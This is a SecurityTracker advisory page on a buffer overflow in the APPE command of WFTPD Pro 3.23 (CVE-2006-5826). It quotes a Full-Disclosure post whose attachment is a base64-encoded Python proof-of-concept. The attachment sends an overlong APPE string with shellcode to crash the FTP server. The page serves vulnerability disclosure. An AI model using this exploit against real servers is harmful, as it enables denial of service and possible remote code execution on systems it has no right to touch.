SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WFTPD Pro Vendors:   Texas Imperial Software
WFTPD Pro Buffer Overflow in APPE Command Lets Remote Authenticated Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017173
SecurityTracker URL:  http://securitytracker.com/id/1017173
CVE Reference:   CVE-2006-5826   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Nov 7 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.23
Description:   A vulnerability was reported in WFTPD Pro. A remote authenticated user can execute arbitrary code on the target system.

A remote authenticated user can send a specially crafted APPE command parameter containing slashes and/or backslashes to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target service.

Joxean Koret discovered this vulnerability.

Impact:   A remote authenticated user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.wftpd.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] WFTPD Pro Server 3.23 Buffer Overflow

--0-1539039305-1162891589=:29996
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Content-Id: 
Content-Disposition: inline

WFTPD Pro Server 3.23 Buffer Overflow
-------------------------------------

A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwritting EIP
is quite easy but I'm too lazy...

Attached goes an (unfinished) POC.

Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
---------------------------------------------------------------------------

Contact
-------
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


		
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
http://es.voice.yahoo.com
--0-1539039305-1162891589=:29996
Content-Type: application/octet-stream; name="bof.py"
Content-Transfer-Encoding: base64
Content-Description: 846879707-bof.py
Content-Disposition: attachment; filename="bof.py"

IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgppbXBvcnQgc3lzCmltcG9ydCBzdHJ1
Y3QKaW1wb3J0IGZ0cGxpYgoKcHJpbnQgIldGVFBEIFBybyBTZXJ2ZXIgMy4y
My4xLjEgQnVmZmVyIE92ZXJmbG93IChPbmx5IGEgRE9TIGN1cnJlbnRseSwg
c2ltcGxlIFBPQykiCnByaW50ICJDb3B5cmlnaHQgKGMpIEpveGVhbiBLb3Jl
dCIKcHJpbnQKCnRhcmdldCA9ICIxOTIuMTY4LjEuMTMiCnRhcmdldFBvcnQg
PSAiMjEiCgp0cnk6CiAgICBmdHAgPSBmdHBsaWIuRlRQKCkKCiAgICBwcmlu
dCAiWytdIENvbm5lY3RpbmcgdG8gdGFyZ2V0ICIKICAgIG1zZyA9IGZ0cC5j
b25uZWN0KHRhcmdldCwgdGFyZ2V0UG9ydCkKICAgIHByaW50ICJbK10gT2su
IFRhcmdldCBiYW5uZXIiCiAgICBwcmludCBtc2cKICAgIHByaW50CiAgICBw
cmludCAiWytdIFRyeWluZyB0byBsb2dnaW5nIGFub255bW91c2x5IgogICAg
bXNnID0gZnRwLmxvZ2luKCkgIyBBbm9ueW1vdXMKICAgIHByaW50ICJbK10g
T2suIE1lc3NhZ2UiCiAgICBwcmludCBtc2cKICAgIHByaW50CmV4Y2VwdDoK
ICAgIHByaW50ICJbIV0gRXhwbG9pdCBkb2Vzbid0IHdvcmsuICIgKyBzdHIo
c3lzLmV4Y19pbmZvKClbMV0pCiAgICBzeXMuZXhpdCgwKQoKCmEgPSAiXFxc
XEE6IgoKZm9yIGkgaW4gcmFuZ2UoNik6CiAgICBhICs9IGEKCnByaW50ICJb
K10gUGFkZGluZyBsZW5ndGggIiArIHN0cihsZW4oYSkpICsgIiBieXRlcyIK
CmIgPSAiQUJDRCIKCmZvciBpIGluIHJhbmdlKDQpOgogICAgYiArPSBiCgph
ID0gYSArICJBQkNEIioxMCArIGIKCnNoZWxsQ29kZSA9ICIiCnNoZWxsQ29k
ZSArPSAiXHgyOVx4YzlceDgzXHhlOVx4YjBceGQ5XHhlZVx4ZDlceDc0XHgy
NFx4ZjRceDViXHg4MVx4NzNceDEzXHhlYyIKc2hlbGxDb2RlICs9ICJceDli
XHgyNlx4OGNceDgzXHhlYlx4ZmNceGUyXHhmNFx4MTBceGYxXHhjZFx4YzFc
eDA0XHg2Mlx4ZDlceDczIgpzaGVsbENvZGUgKz0gIlx4MTNceGZiXHhhZFx4
ZTBceGM4XHhiZlx4YWRceGM5XHhkMFx4MTBceDVhXHg4OVx4OTRceDlhXHhj
OVx4MDciCnNoZWxsQ29kZSArPSAiXHhhM1x4ODNceGFkXHhkM1x4Y2NceDlh
XHhjZFx4YzVceDY3XHhhZlx4YWRceDhkXHgwMlx4YWFceGU2XHgxNSIKc2hl
bGxDb2RlICs9ICJceDQwXHgxZlx4ZTZceGY4XHhlYlx4NWFceGVjXHg4MVx4
ZWRceDU5XHhjZFx4NzhceGQ3XHhjZlx4MDJceGE0IgpzaGVsbENvZGUgKz0g
Ilx4OTlceDdlXHhhZFx4ZDNceGM4XHg5YVx4Y2RceGVhXHg2N1x4OTdceDZk
XHgwN1x4YjNceDg3XHgyN1x4NjciCnNoZWxsQ29kZSArPSAiXHhlZlx4Yjdc
eGFkXHgwNVx4ODBceGJmXHgzYVx4ZWRceDJmXHhhYVx4ZmRceGU4XHg2N1x4
ZDhceDE2XHgwNyIKc2hlbGxDb2RlICs9ICJceGFjXHg5N1x4YWRceGZjXHhm
MFx4MzZceGFkXHhjY1x4ZTRceGM1XHg0ZVx4MDJceGEyXHg5NVx4Y2FceGRj
IgpzaGVsbENvZGUgKz0gIlx4MTNceDRkXHg0MFx4ZGZceDhhXHhmM1x4MTVc
eGJlXHg4NFx4ZWNceDU1XHhiZVx4YjNceGNmXHhkOVx4NWMiCnNoZWxsQ29k
ZSArPSAiXHg4NFx4NTBceGNiXHg3MFx4ZDdceGNiXHhkOVx4NWFceGIzXHgx
Mlx4YzNceGVhXHg2ZFx4NzZceDJlXHg4ZSIKc2hlbGxDb2RlICs9ICJceGI5
XHhmMVx4MjRceDczXHgzY1x4ZjNceGZmXHg4NVx4MTlceDM2XHg3MVx4NzNc
eDNhXHhjOFx4NzVceGRmIgpzaGVsbENvZGUgKz0gIlx4YmZceGM4XHg2NVx4
ZGZceGFmXHhjOFx4ZDlceDVjXHg4YVx4ZjNceDM3XHhkMFx4OGFceGM4XHhh
Zlx4NmQiCnNoZWxsQ29kZSArPSAiXHg3OVx4ZjNceDgyXHg5Nlx4OWNceDVj
XHg3MVx4NzNceDNhXHhmMVx4MzZceGRkXHhiOVx4NjRceGY2XHhlNCIKc2hl
bGxDb2RlICs9ICJceDQ4XHgzNlx4MDhceDY1XHhiYlx4NjRceGYwXHhkZlx4
YjlceDY0XHhmNlx4ZTRceDA5XHhkMlx4YTBceGM1IgpzaGVsbENvZGUgKz0g
Ilx4YmJceDY0XHhmMFx4ZGNceGI4XHhjZlx4NzNceDczXHgzY1x4MDhceDRl
XHg2Ylx4OTVceDVkXHg1Zlx4ZGIiCnNoZWxsQ29kZSArPSAiXHgxM1x4NGRc
eDczXHg3M1x4M2NceGZkXHg0Y1x4ZThceDhhXHhmM1x4NDVceGUxXHg2NVx4
N2VceDRjXHhkYyIKc2hlbGxDb2RlICs9ICJceGI1XHhiMlx4ZWFceDA1XHgw
Ylx4ZjFceDYyXHgwNVx4MGVceGFhXHhlNlx4N2ZceDQ2XHg2NVx4NjRceGEx
IgpzaGVsbENvZGUgKz0gIlx4MTJceGQ5XHgwYVx4MWZceDYxXHhlMVx4MWVc
eDI3XHg0N1x4MzBceDRlXHhmZVx4MTJceDI4XHgzMFx4NzMiCnNoZWxsQ29k
ZSArPSAiXHg5OVx4ZGZceGQ5XHg1YVx4YjdceGNjXHg3NFx4ZGRceGJkXHhj
YVx4NGNceDhkXHhiZFx4Y2FceDczXHhkZCIKc2hlbGxDb2RlICs9ICJceDEz
XHg0Ylx4NGVceDIxXHgzNVx4OWVceGU4XHhkZlx4MTNceDRkXHg0Y1x4NzNc
eDEzXHhhY1x4ZDlceDVjIgpzaGVsbENvZGUgKz0gIlx4NjdceGNjXHhkYVx4
MGZceDI4XHhmZlx4ZDlceDVhXHhiZVx4NjRceGY2XHhlNFx4MWNceDExXHgy
Mlx4ZDMiCnNoZWxsQ29kZSArPSAiXHhiZlx4NjRceGYwXHg3M1x4M2NceDli
XHgyNlx4OGMiCgphID0gYSArICJKT1hFQU4iICMrIHNoZWxsQ29kZQoKcHJp
bnQgIlsrXSBFeHBsb2l0aW5nIHdpdGggYSBidWZmZXIgb2YgIiArIHN0cihs
ZW4oYSkpICsgIiBieXRlKHMpIC4uLiAiCgp0cnk6CiAgICBtc2cgPSBmdHAu
c2VuZGNtZCgiQVBQRSAiICsgYSkKICAgIHByaW50ICJbIV0gRXhwbG9pdCBk
b2Vzbid0IHdvcmsgWyIgKyBtc2cgKyAiXSIKZXhjZXB0OgogICAgcHJpbnQg
IlsrXSBFeHBsb2l0IGFwcGFyZW50bHkgd29ya3MuIFRyeWluZyB0byB2ZXJp
ZnkgaXQgLi4uICIKCiAgICB0cnk6CiAgICAgICAgZnRwLmNvbm5lY3QodGFy
Z2V0LCB0YXJnZXRQb3J0KQogICAgICAgIHByaW50ICJbIV0gTm8sIGl0IGRv
ZXNuJ3Qgd29yayBbIiArIHN0cihzeXMuZXhjX2luZm8oKVsxXSkgKyAiXSA6
KCIKICAgIGV4Y2VwdDoKICAgICAgICBwcmludCAiWyFdIE9rLiBTZXJ2ZXIg
aXMgZGVhZCwgZXhwbG9pdCBzdWNjZXNzZnVsbHkgZXhlY3V0ZWQuICIKCg==


--0-1539039305-1162891589=:29996
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--0-1539039305-1162891589=:29996--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC